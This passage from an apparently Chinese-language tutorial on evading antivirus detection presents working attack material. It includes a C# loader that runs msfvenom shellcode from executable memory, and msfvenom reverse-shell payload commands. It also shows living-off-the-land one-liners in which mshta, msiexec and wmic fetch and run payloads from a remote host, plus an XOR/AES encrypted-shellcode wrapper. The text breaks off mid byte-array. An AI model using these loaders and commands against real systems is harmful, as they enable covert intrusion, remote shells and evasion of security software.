<span class="mh">0x01</span><span class="p">,</span><span class="mh">0xd0</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x04</span><span class="p">,</span><span class="mh">0x88</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x01</span><span class="p">,</span><span class="mh">0xd0</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x58</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x58</span><span class="p">,</span><span class="mh">0x5e</span><span class="p">,</span><span class="mh">0x59</span><span class="p">,</span><span class="mh">0x5a</span><span class="p">,</span>
<span class="mh">0x41</span><span class="p">,</span><span class="mh">0x58</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x59</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x5a</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x83</span><span class="p">,</span><span class="mh">0xec</span><span class="p">,</span><span class="mh">0x20</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x52</span><span class="p">,</span><span class="mh">0xff</span><span class="p">,</span><span class="mh">0xe0</span><span class="p">,</span><span class="mh">0x58</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span>
<span class="mh">0x59</span><span class="p">,</span><span class="mh">0x5a</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x8b</span><span class="p">,</span><span class="mh">0x12</span><span class="p">,</span><span class="mh">0xe9</span><span class="p">,</span><span class="mh">0x57</span><span class="p">,</span><span class="mh">0xff</span><span class="p">,</span><span class="mh">0xff</span><span class="p">,</span><span class="mh">0xff</span><span class="p">,</span><span class="mh">0x5d</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0xba</span><span class="p">,</span><span class="mh">0x01</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span>
<span class="mh">0x00</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x8d</span><span class="p">,</span><span class="mh">0x8d</span><span class="p">,</span><span class="mh">0x01</span><span class="p">,</span><span class="mh">0x01</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0xba</span><span class="p">,</span><span class="mh">0x31</span><span class="p">,</span><span class="mh">0x8b</span><span class="p">,</span>
<span class="mh">0x6f</span><span class="p">,</span><span class="mh">0x87</span><span class="p">,</span><span class="mh">0xff</span><span class="p">,</span><span class="mh">0xd5</span><span class="p">,</span><span class="mh">0xbb</span><span class="p">,</span><span class="mh">0xe0</span><span class="p">,</span><span class="mh">0x1d</span><span class="p">,</span><span class="mh">0x2a</span><span class="p">,</span><span class="mh">0x0a</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0xba</span><span class="p">,</span><span class="mh">0xa6</span><span class="p">,</span><span class="mh">0x95</span><span class="p">,</span><span class="mh">0xbd</span><span class="p">,</span><span class="mh">0x9d</span><span class="p">,</span><span class="mh">0xff</span><span class="p">,</span>
<span class="mh">0xd5</span><span class="p">,</span><span class="mh">0x48</span><span class="p">,</span><span class="mh">0x83</span><span class="p">,</span><span class="mh">0xc4</span><span class="p">,</span><span class="mh">0x28</span><span class="p">,</span><span class="mh">0x3c</span><span class="p">,</span><span class="mh">0x06</span><span class="p">,</span><span class="mh">0x7c</span><span class="p">,</span><span class="mh">0x0a</span><span class="p">,</span><span class="mh">0x80</span><span class="p">,</span><span class="mh">0xfb</span><span class="p">,</span><span class="mh">0xe0</span><span class="p">,</span><span class="mh">0x75</span><span class="p">,</span><span class="mh">0x05</span><span class="p">,</span><span class="mh">0xbb</span><span class="p">,</span><span class="mh">0x47</span><span class="p">,</span>
<span class="mh">0x13</span><span class="p">,</span><span class="mh">0x72</span><span class="p">,</span><span class="mh">0x6f</span><span class="p">,</span><span class="mh">0x6a</span><span class="p">,</span><span class="mh">0x00</span><span class="p">,</span><span class="mh">0x59</span><span class="p">,</span><span class="mh">0x41</span><span class="p">,</span><span class="mh">0x89</span><span class="p">,</span><span class="mh">0xda</span><span class="p">,</span><span class="mh">0xff</span><span class="p">,</span><span class="mh">0xd5</span><span class="p">,</span><span class="mh">0x63</span><span class="p">,</span><span class="mh">0x61</span><span class="p">,</span><span class="mh">0x6c</span><span class="p">,</span><span class="mh">0x63</span><span class="p">,</span><span class="mh">0x00</span>
<span class="p">};</span>
<span class="nx">MemoryMappedFile</span> <span class="nx">mmf</span> <span class="p">=</span> <span class="nx">null</span><span class="p">;</span>
<span class="nx">MemoryMappedViewAccessor</span> <span class="nx">viewaccessor</span> <span class="p">=</span> <span class="nx">null</span><span class="p">;</span>
<span class="nx">try</span>
<span class="p">{</span>
<span class="cm">/* The try block creates the MMF and assigns the RWE permissions</span>
The view accessor is created with matching permissions
the shell code from GetShellMemAddr is written to MMF
then the pointer is gained and a delegate is created to handle pointer value
so that it can be passed in therms of the returned function */
<span class="nx">mmf</span> <span class="p">=</span> <span class="nx">MemoryMappedFile</span><span class="p">.</span><span class="nx">CreateNew</span><span class="p">(</span><span class="s">"__shellcode"</span><span class="p">,</span> <span class="nx">shellcode</span><span class="p">.</span><span class="nx">Length</span><span class="p">,</span> <span class="nx">MemoryMappedFileAccess</span><span class="p">.</span><span class="nx">ReadWriteExecute</span><span class="p">);</span>
<span class="nx">viewaccessor</span> <span class="p">=</span> <span class="nx">mmf</span><span class="p">.</span><span class="nx">CreateViewAccessor</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">shellcode</span><span class="p">.</span><span class="nx">Length</span><span class="p">,</span> <span class="nx">MemoryMappedFileAccess</span><span class="p">.</span><span class="nx">ReadWriteExecute</span><span class="p">);</span>
<span class="nx">viewaccessor</span><span class="p">.</span><span class="nx">WriteArray</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">shellcode</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nx">shellcode</span><span class="p">.</span><span class="nx">Length</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">pointer</span> <span class="p">=</span> <span class="p">(</span><span class="kt">byte</span><span class="o">*</span><span class="p">)</span><span class="mi">0</span><span class="p">;</span>
<span class="nx">viewaccessor</span><span class="p">.</span><span class="nx">SafeMemoryMappedViewHandle</span><span class="p">.</span><span class="nx">AcquirePointer</span><span class="p">(</span><span class="nx">ref</span> <span class="nx">pointer</span><span class="p">);</span>
<span class="kd">var</span> <span class="kd">func</span> <span class="p">=</span> <span class="p">(</span><span class="nx">NewDelegate</span><span class="p">)</span><span class="nx">Marshal</span><span class="p">.</span><span class="nx">GetDelegateForFunctionPointer</span><span class="p">(</span><span class="nx">new</span> <span class="nx">IntPtr</span><span class="p">(</span><span class="nx">pointer</span><span class="p">),</span> <span class="nx">typeof</span><span class="p">(</span><span class="nx">NewDelegate</span><span class="p">));</span>
<span class="k">return</span> <span class="kd">func</span><span class="p">();</span>
<span class="p">}</span>
<span class="nx">catch</span>
<span class="p">{</span>
<span class="k">return</span> <span class="nx">IntPtr</span><span class="p">.</span><span class="nx">Zero</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">finally</span> <span class="c1">// You should always clean up after yourself :)</span>
<span class="p">{</span>
<span class="nx">viewaccessor</span><span class="p">.</span><span class="nx">Dispose</span><span class="p">();</span>
<span class="nx">mmf</span><span class="p">.</span><span class="nx">Dispose</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">static</span> <span class="nx">void</span> <span class="nx">Main</span><span class="p">(</span><span class="kt">string</span><span class="p">[]</span> <span class="nx">args</span><span class="p">)</span>
<span class="p">{</span>
<span class="nx">GetShellMemAddr</span><span class="p">();</span>
<span class="p">}</span>
}
}
msfvenom -p windows/x64/exec CMD="cmd.exe -c calc.exe" -f csharp
Invoke-MMFml
加载器就到这里吧,加载器的实现有能力可以自己造轮子,免杀效果非常不错的。
B)Lolbins白利用加载shellcode
除了加载器这种"杯子和水"的分离的思想,个人认为还具有"分离"免杀思想的就是Lolbins,也就是白名单。
下面例举一些白利用,这种分离多半是因为杀行为特征,比如你这个程序运行上下文不应该访问某个api,这种就会被捕获,而白利用就是绕过这种行为捕获,而这种白利用中有的shellcode或执行文件还是会落地被查杀,这个文后部分会提到,先来看白利用。
LOLBins,全称“Living-Off-the-Land Binaries”,直白翻译为“生活在陆地上的二进制“,这个概念最初在2013年DerbyCon黑客大会由Christopher Campbell和Matt Graeber进行创造,最终Philip Goh提出了LOLBins这个概念。 说白了就是白利用 ,举个例子:
DarkHydrus APT样本
MD5:B108412F1CDC0602D82D3E6B318DC634
使用到的启动命令:cscript.exe “C:\Users\Public\Documents\ OfficeUpdateService.vbs”
这里就用了cscript加载vbs 添加开机启动项,启动脚本。
mshta:
payload:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.174.134 LPORT=53 -f raw > shellcode.bin
cat shellcode.bin |base64 -w 0
mshta.exe http://192.168.174.134 /qing.hta
替换模板:
https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta
shellcode替换位置:
Msiexec:
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.174.134 LPORT=4444 - f msi > qing.txt
C:\Windows\System32\msiexec.exe /q /i http://192.168.174.134 /qing.txt
加载dll:
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.174.134 LPORT=53 - f dll > qing.dll
msiexec /y C:\qing.dll
Msbuild:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe qing.xml
模板用三好师傅的:
https://github.com/3gstudent/msbuild-inline-task
Installutil:
编译:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.Ente rpriseServices.dll /r:System.IO.Compression.dll /target:library /out:qing.exe /keyfile:C:\Users\John\Desktop\installutil.snk /unsafe C:\Users\John\Desktop\installutil.cs
执行:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U qing.exe
详细:
https://www.blackhillsinfosec.com/how-to-bypass-application-whitelisting-av/
wmic:
wmic os get /FORMAT:"http://example.com/evil.xsl"
模板:
https://raw.githubusercontent.com/kmkz/Sources/master/wmic-poc.xsl
csc:
msfvenom ‐p windows/x64/shell/reverse_tcp LHOST=192.168.174.132 LPORT=53 ‐ f csharp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:D:\test\InstallUtil-shell.exe D:\test\InstallUtil-ShellCode.cs
通过IInstallutil执行即可
白利用就不列举更多了,其他一些白利用也是一个道理,那么问题来了,前面说的白利用执行某些时候我们的shellcode生成的exe或者dll还是会落地,
虽然前面说的内存加载可以解决这个问题,那假设必须落地,怎么逃过各种检测呢?
这就是我归为免杀的第二个方式大类,混淆免杀。
0x02 那些shellcode"混淆"免杀
shellcode是否可以像php一句话那样混淆、加密、拆分呢
还是从最简单的举例子开始
A)shellcode编码混淆
xor异或加密shellcode后,申请内存执行,和文开头执行shell从的方式无区别
这里拿C# xor为例子(ShellcodeWrapper):
using System;
using System.IO;
using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;
using System.Security.Cryptography;
using System.Runtime.InteropServices;
namespace RunShellCode
{
static class Program
{
//
// CRYPTO FUNCTIONS
//
private static T[] SubArray<T>(this T[] data, int index, int length)
{
T[] result = new T[length];
Array.Copy(data, index, result, 0, length);
return result;
}
<span class="k">private</span> <span class="k">static</span> <span class="kt">byte</span><span class="p">[]</span> <span class="nf">xor</span><span class="p">(</span><span class="kt">byte</span><span class="p">[]</span> <span class="n">cipher</span><span class="p">,</span> <span class="kt">byte</span><span class="p">[]</span> <span class="n">key</span><span class="p">)</span> <span class="p">{</span>
<span class="kt">byte</span><span class="p">[]</span> <span class="n">decrypted</span> <span class="p">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="p">[</span><span class="n">cipher</span><span class="p">.</span><span class="n">Length</span><span class="p">];</span>
<span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> <span class="n">i</span> <span class="p"><</span> <span class="n">cipher</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span> <span class="n">i</span><span class="p">++)</span> <span class="p">{</span>
<span class="n">decrypted</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="p">=</span> <span class="p">(</span><span class="kt">byte</span><span class="p">)</span> <span class="p">(</span><span class="n">cipher</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="p">^</span> <span class="n">key</span><span class="p">[</span><span class="n">i</span> <span class="p">%</span> <span class="n">key</span><span class="p">.</span><span class="n">Length</span><span class="p">]);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">decrypted</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//--------------------------------------------------------------------------------------------------</span>
<span class="c1">// Decrypts the given a plaintext message byte array with a given 128 bits key</span>
<span class="c1">// Returns the unencrypted message</span>
<span class="c1">//--------------------------------------------------------------------------------------------------</span>
<span class="k">private</span> <span class="k">static</span> <span class="kt">byte</span><span class="p">[]</span> <span class="nf">aesDecrypt</span><span class="p">(</span><span class="kt">byte</span><span class="p">[]</span> <span class="n">cipher</span><span class="p">,</span> <span class="kt">byte</span><span class="p">[]</span> <span class="n">key</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">var</span> <span class="n">IV</span> <span class="p">=</span> <span class="n">cipher</span><span class="p">.</span><span class="n">SubArray</span><span class="p">(</span><span class="m">0</span><span class="p">,</span> <span class="m">16</span><span class="p">);</span>
<span class="kt">var</span> <span class="n">encryptedMessage</span> <span class="p">=</span> <span class="n">cipher</span><span class="p">.</span><span class="n">SubArray</span><span class="p">(</span><span class="m">16</span><span class="p">,</span> <span class="n">cipher</span><span class="p">.</span><span class="n">Length</span> <span class="p">-</span> <span class="m">16</span><span class="p">);</span>
<span class="c1">// Create an AesManaged object with the specified key and IV.</span>
<span class="k">using</span> <span class="p">(</span><span class="n">AesManaged</span> <span class="n">aes</span> <span class="p">=</span> <span class="k">new</span> <span class="n">AesManaged</span><span class="p">())</span>
<span class="p">{</span>
<span class="n">aes</span><span class="p">.</span><span class="n">Padding</span> <span class="p">=</span> <span class="n">PaddingMode</span><span class="p">.</span><span class="n">PKCS7</span><span class="p">;</span>
<span class="n">aes</span><span class="p">.</span><span class="n">KeySize</span> <span class="p">=</span> <span class="m">128</span><span class="p">;</span>
<span class="n">aes</span><span class="p">.</span><span class="n">Key</span> <span class="p">=</span> <span class="n">key</span><span class="p">;</span>
<span class="n">aes</span><span class="p">.</span><span class="n">IV</span> <span class="p">=</span> <span class="n">IV</span><span class="p">;</span>
<span class="k">using</span> <span class="p">(</span><span class="n">MemoryStream</span> <span class="n">ms</span> <span class="p">=</span> <span class="k">new</span> <span class="n">MemoryStream</span><span class="p">())</span>
<span class="p">{</span>
<span class="k">using</span> <span class="p">(</span><span class="n">CryptoStream</span> <span class="n">cs</span> <span class="p">=</span> <span class="k">new</span> <span class="n">CryptoStream</span><span class="p">(</span><span class="n">ms</span><span class="p">,</span> <span class="n">aes</span><span class="p">.</span><span class="n">CreateDecryptor</span><span class="p">(),</span> <span class="n">CryptoStreamMode</span><span class="p">.</span><span class="n">Write</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">cs</span><span class="p">.</span><span class="n">Write</span><span class="p">(</span><span class="n">encryptedMessage</span><span class="p">,</span> <span class="m">0</span><span class="p">,</span> <span class="n">encryptedMessage</span><span class="p">.</span><span class="n">Length</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">ms</span><span class="p">.</span><span class="n">ToArray</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1">//==============================================================================</span>
<span class="c1">// MAIN FUNCTION</span>
<span class="c1">//==============================================================================</span>
<span class="k">static</span> <span class="k">void</span> <span class="nf">Main</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">byte</span><span class="p">[]</span> <span class="n">encryptedShellcode</span> <span class="p">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="p">[]</span> <span class="p">{</span> <span class="m">0</span><span class="n">x8d</span><span class="p">,</span><span class="m">0</span><span class="n">x81</span><span class="p">,</span><span class="m">0</span><span class="n">xec</span><span class="p">,</span><span class="m">0</span><span class="n">x67</span><span class="p">,</span><span class="m">0</span><span class="n">x71</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x0e</span><span class="p">,</span><span class="m">0</span><span class="n">xee</span><span class="p">,</span><span class="m">0</span><span class="n">x94</span><span class="p">,</span><span class="m">0</span><span class="n">x58</span><span class="p">,</span><span class="m">0</span><span class="n">xae</span><span class="p">,</span><span class="m">0</span><span class="n">x03</span><span class="p">,</span><span class="m">0</span><span class="n">xfa</span><span class="p">,</span><span class="m">0</span><span class="n">x39</span><span class="p">,</span><span class="m">0</span><span class="n">x5e</span><span class="p">,</span><span class="m">0</span><span class="n">xec</span><span class="p">,</span><span class="m">0</span><span class="n">x23</span><span class="p">,</span><span class="m">0</span><span class="n">x65</span><span class="p">,</span><span class="m">0</span><span class="n">xe5</span><span class="p">,</span><span class="m">0</span><span class="n">x35</span><span class="p">,</span><span class="m">0</span><span class="n">x65</span><span class="p">,</span><span class="m">0</span><span class="n">xe2</span><span class="p">,</span><span class="m">0</span><span class="n">x1c</span><span class="p">,</span><span class="m">0</span><span class="n">x4f</span><span class="p">,</span><span class="m">0</span><span class="n">x7e</span><span class="p">,</span><span class="m">0</span><span class="n">xde</span><span class="p">,</span><span class="m">0</span><span class="n">x24</span><span class="p">,</span><span class="m">0</span><span class="n">x41</span><span class="p">,</span><span class="m">0</span><span class="n">x40</span><span class="p">,</span><span class="m">0</span><span class="n">x96</span><span class="p">,</span><span class="m">0</span><span class="n">xc2</span><span class="p">,</span><span class="m">0</span><span class="n">x5b</span><span class="p">,</span><span class="m">0</span><span class="n">x10</span><span class="p">,</span><span class="m">0</span><span class="n">x15</span><span class="p">,</span><span class="m">0</span><span class="n">x6c</span><span class="p">,</span><span class="m">0</span><span class="n">x4b</span><span class="p">,</span><span class="m">0</span><span class="n">x51</span><span class="p">,</span><span class="m">0</span><span class="n">xa8</span><span class="p">,</span><span class="m">0</span><span class="n">xa1</span><span class="p">,</span><span class="m">0</span><span class="n">x6a</span><span class="p">,</span><span class="m">0</span><span class="n">x70</span><span class="p">,</span><span class="m">0</span><span class="n">xae</span><span class="p">,</span><span class="m">0</span><span class="n">x8c</span><span class="p">,</span><span class="m">0</span><span class="n">x95</span><span class="p">,</span><span class="m">0</span><span class="n">x23</span><span class="p">,</span><span class="m">0</span><span class="n">x3e</span><span class="p">,</span><span class="m">0</span><span class="n">xe5</span><span class="p">,</span><span class="m">0</span><span class="n">x35</span><span class="p">,</span><span class="m">0</span><span class="n">x61</span><span class="p">,</span><span class="m">0</span><span class="n">xe2</span><span class="p">,</span><span class="m">0</span><span class="n">x24</span><span class="p">,</span><span class="m">0</span><span class="n">x5b</span><span class="p">,</span><span class="m">0</span><span class="n">xfa</span><span class="p">,</span><span class="m">0</span><span class="n">x25</span><span class="p">,</span><span class="m">0</span><span class="n">x7f</span><span class="p">,</span><span class="m">0</span><span class="n">x1f</span><span class="p">,</span><span class="m">0</span><span class="n">x92</span><span class="p">,</span><span class="m">0</span><span class="n">x21</span><span class="p">,</span><span class="m">0</span><span class="n">x6f</span><span class="p">,</span><span class="m">0</span><span class="n">xb6</span><span class="p">,</span><span class="m">0</span><span class="n">x20</span><span class="p">,</span><span class="m">0</span><span class="n">xe2</span><span class="p">,</span><span class="m">0</span><span class="n">x37</span><span class="p">,</span><span class="m">0</span><span class="n">x47</span><span class="p">,</span><span class="m">0</span><span class="n">x70</span><span class="p">,</span><span class="m">0</span><span class="n">xba</span><span class="p">,</span><span class="m">0</span><span class="n">xe5</span><span class="p">,</span><span class="m">0</span><span class="n">x2e</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x8a</span><span class="p">,</span><span class="m">0</span><span class="n">x54</span><span class="p">,</span><span class="m">0</span><span class="n">x2e</span><span class="p">,</span><span class="m">0</span><span class="n">xfa</span><span class="p">,</span><span class="m">0</span><span class="n">x5d</span><span class="p">,</span><span class="m">0</span><span class="n">xe5</span><span class="p">,</span><span class="m">0</span><span class="n">x66</span><span class="p">,</span><span class="m">0</span><span class="n">xa7</span><span class="p">,</span><span class="m">0</span><span class="n">x58</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">xcb</span><span class="p">,</span><span class="m">0</span><span class="n">xb0</span><span class="p">,</span><span class="m">0</span><span class="n">xa6</span><span class="p">,</span><span class="m">0</span><span class="n">x63</span><span class="p">,</span><span class="m">0</span><span class="n">x66</span><span class="p">,</span><span class="m">0</span><span class="n">xb6</span><span class="p">,</span><span class="m">0</span><span class="n">x51</span><span class="p">,</span><span class="m">0</span><span class="n">x8e</span><span class="p">,</span><span class="m">0</span><span class="n">x12</span><span class="p">,</span><span class="m">0</span><span class="n">x87</span><span class="p">,</span><span class="m">0</span><span class="n">x6a</span><span class="p">,</span><span class="m">0</span><span class="n">x13</span><span class="p">,</span><span class="m">0</span><span class="n">x9f</span><span class="p">,</span><span class="m">0</span><span class="n">x4a</span><span class="p">,</span><span class="m">0</span><span class="n">x14</span><span class="p">,</span><span class="m">0</span><span class="n">x4a</span><span class="p">,</span><span class="m">0</span><span class="n">x12</span><span class="p">,</span><span class="m">0</span><span class="n">x95</span><span class="p">,</span><span class="m">0</span><span class="n">x31</span><span class="p">,</span><span class="m">0</span><span class="n">xe5</span><span class="p">,</span><span class="m">0</span><span class="n">x3f</span><span class="p">,</span><span class="m">0</span><span class="n">x55</span><span class="p">,</span><span class="m">0</span><span class="n">x68</span><span class="p">,</span><span class="m">0</span><span class="n">xbd</span><span class="p">,</span><span class="m">0</span><span class="n">x01</span><span class="p">,</span><span class="m">0</span><span class="n">xfa</span><span class="p">,</span><span class="m">0</span><span class="n">x65</span><span class="p">,</span><span class="m">0</span><span class="n">x25</span><span class="p">,</span><span class="m">0</span><span class="n">xec</span><span class="p">,</span><span class="m">0</span><span class="n">x29</span><span class="p">,</span><span class="m">0</span><span class="n">x75</span><span class="p">,</span><span class="m">0</span><span class="n">x6f</span><span class="p">,</span><span class="m">0</span><span class="n">xb4</span><span class="p">,</span><span class="m">0</span><span class="n">xfa</span><span class="p">,</span><span class="m">0</span><span class="n">x6d</span><span class="p">,</span><span class="m">0</span><span class="n">xe5</span><span class="p">,</span><span class="m">0</span><span class="n">x66</span><span class="p">,</span><span class="m">0</span><span class="n">xa1</span><span class="p">,</span><span class="m">0</span><span class="n">xe0</span><span class="p">,</span><span class="m">0</span><span class="n">x2a</span><span class="p">,</span><span class="m">0</span><span class="n">x43</span><span class="p">,</span><span class="m">0</span><span class="n">x55</span><span class="p">,</span><span class="m">0</span><span class="n">x32</span><span class="p">,</span><span class="m">0</span><span class="n">x35</span><span class="p">,</span><span class="m">0</span><span class="n">x06</span><span class="p">,</span><span class="m">0</span><span class="n">x28</span><span class="p">,</span><span class="m">0</span><span class="n">x33</span><span class="p">,</span><span class="m">0</span><span class="n">x3f</span><span class="p">,</span><span class="m">0</span><span class="n">x98</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">x36</span><span class="p">,</span><span class="m">0</span><span class="n">x31</span><span class="p">,</span><span class="m">0</span><span class="n">x3d</span><span class="p">,</span><span class="m">0</span><span class="n">xfa</span><span class="p">,</span><span class="m">0</span><span class="n">x7b</span><span class="p">,</span><span class="m">0</span><span class="n">x85</span><span class="p">,</span><span class="m">0</span><span class="n">xea</span><span class="p">,</span><span class="m">0</span><span class="n">x2c</span><span class="p">,</span><span class="m">0</span><span class="n">x01</span><span class="p">,</span><span class="m">0</span><span class="n">x5d</span><span class="p">,</span><span class="m">0</span><span class="n">x55</span><span class="p">,</span><span class="m">0</span><span class="n">x71</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x06</span><span class="p">,</span><span class="m">0</span><span class="n">x10</span><span class="p">,</span><span class="m">0</span><span class="n">x02</span><span class="p">,</span><span class="m">0</span><span class="n">x5b</span><span class="p">,</span><span class="m">0</span><span class="n">x31</span><span class="p">,</span><span class="m">0</span><span class="n">x33</span><span class="p">,</span><span class="m">0</span><span class="n">x19</span><span class="p">,</span><span class="m">0</span><span class="n">x25</span><span class="p">,</span><span class="m">0</span><span class="n">x19</span><span class="p">,</span><span class="m">0</span><span class="n">x41</span><span class="p">,</span><span class="m">0</span><span class="n">x76</span><span class="p">,</span><span class="m">0</span><span class="n">xe0</span><span class="p">,</span><span class="m">0</span><span class="n">x86</span><span class="p">,</span><span class="m">0</span><span class="n">x98</span><span class="p">,</span><span class="m">0</span><span class="n">xa1</span><span class="p">,</span><span class="m">0</span><span class="n">xd1</span><span class="p">,</span><span class="m">0</span><span class="n">xfe</span><span class="p">,</span><span class="m">0</span><span class="n">x66</span><span class="p">,</span><span class="m">0</span><span class="n">x71</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x47</span><span class="p">,</span><span class="m">0</span><span class="n">xa3</span><span class="p">,</span><span class="m">0</span><span class="n">x25</span><span class="p">,</span><span class="m">0</span><span class="n">x39</span><span class="p">,</span><span class="m">0</span><span class="n">x06</span><span class="p">,</span><span class="m">0</span><span class="n">x4e</span><span class="p">,</span><span class="m">0</span><span class="n">xf1</span><span class="p">,</span><span class="m">0</span><span class="n">x02</span><span class="p">,</span><span class="m">0</span><span class="n">x6e</span><span class="p">,</span><span class="m">0</span><span class="n">x98</span><span class="p">,</span><span class="m">0</span><span class="n">xa4</span><span class="p">,</span><span class="m">0</span><span class="n">x03</span><span class="p">,</span><span class="m">0</span><span class="n">x64</span><span class="p">,</span><span class="m">0</span><span class="n">x0f</span><span class="p">,</span><span class="m">0</span><span class="n">xb1</span><span class="p">,</span><span class="m">0</span><span class="n">xc1</span><span class="p">,</span><span class="m">0</span><span class="n">xc0</span><span class="p">,</span><span class="m">0</span><span class="n">xe9</span><span class="p">,</span><span class="m">0</span><span class="n">x19</span><span class="p">,</span><span class="m">0</span><span class="n">x6b</span><span class="p">,</span><span class="m">0</span><span class="n">x6e</span><span class="p">,</span><span class="m">0</span><span class="n">x76</span><span class="p">,</span><span class="m">0</span><span class="n">x2d</span><span class="p">,</span><span class="m">0</span><span class="n">xe0</span><span class="p">,</span><span class="m">0</span><span class="n">x88</span><span class="p">,</span><span class="m">0</span><span class="n">x37</span><span class="p">,</span><span class="m">0</span><span class="n">x21</span><span class="p">,</span><span class="m">0</span><span class="n">x39</span><span class="p">,</span><span class="m">0</span><span class="n">x3e</span><span class="p">,</span><span class="m">0</span><span class="n">x27</span><span class="p">,</span><span class="m">0</span><span class="n">x21</span><span class="p">,</span><span class="m">0</span><span class="n">x29</span><span class="p">,</span><span class="m">0</span><span class="n">x3e</span><span class="p">,</span><span class="m">0</span><span class="n">x0f</span><span class="p">,</span><span class="m">0</span><span class="n">x9b</span><span class="p">,</span><span class="m">0</span><span class="n">x66</span><span class="p">,</span><span class="m">0</span><span class="n">xb1</span><span class="p">,</span><span class="m">0</span><span class="n">x87</span><span class="p">,</span><span class="m">0</span><span class="n">x8e</span><span class="p">,</span><span class="m">0</span><span class="n">xbc</span><span class="p">,</span><span class="m">0</span><span class="n">xf9</span><span class="p">,</span><span class="m">0</span><span class="n">x0d</span><span class="p">,</span><span class="m">0</span><span class="n">x61</span><span class="p">,</span><span class="m">0</span><span class="n">x3f</span><span class="p">,</span><span class="m">0</span><span class="n">x39</span><span class="p">,</span><span class="m">0</span><span class="n">x0f</span><span class="p">,</span><span class="m">0</span><span class="n">xe8</span><span class="p">,</span><span class="m">0</span><span class="n">xcc</span><span class="p">,</span><span class="m">0</span><span class="n">x1a</span><span class="p">,</span><span class="m">0</span><span class="n">x06</span><span class="p">,</span><span class="m">0</span><span class="n">x8e</span><span class="p">,</span><span class="m">0</span><span class="n">xbc</span><span class="p">,</span><span class="m">0</span><span class="n">xeb</span><span class="p">,</span><span class="m">0</span><span class="n">xa7</span><span class="p">,</span><span class="m">0</span><span class="n">x05</span><span class="p">,</span><span class="m">0</span><span class="n">x63</span><span class="p">,</span><span class="m">0</span><span class="n">x91</span><span class="p">,</span><span class="m">0</span><span class="n">x29</span><span class="p">,</span><span class="m">0</span><span class="n">x79</span><span class="p">,</span><span class="m">0</span><span class="n">x1c</span><span class="p">,</span><span class="m">0</span><span class="n">x82</span><span class="p">,</span><span class="m">0</span><span class="n">x8f</span><span class="p">,</span><span class="m">0</span><span class="n">x16</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x6e</span><span class="p">,</span><span class="m">0</span><span class="n">x67</span><span class="p">,</span><span class="m">0</span><span class="n">x1b</span><span class="p">,</span><span class="m">0</span><span class="n">x69</span><span class="p">,</span><span class="m">0</span><span class="n">x04</span><span class="p">,</span><span class="m">0</span><span class="n">x63</span><span class="p">,</span><span class="m">0</span><span class="n">x27</span><span class="p">,</span><span class="m">0</span><span class="n">x3e</span><span class="p">,</span><span 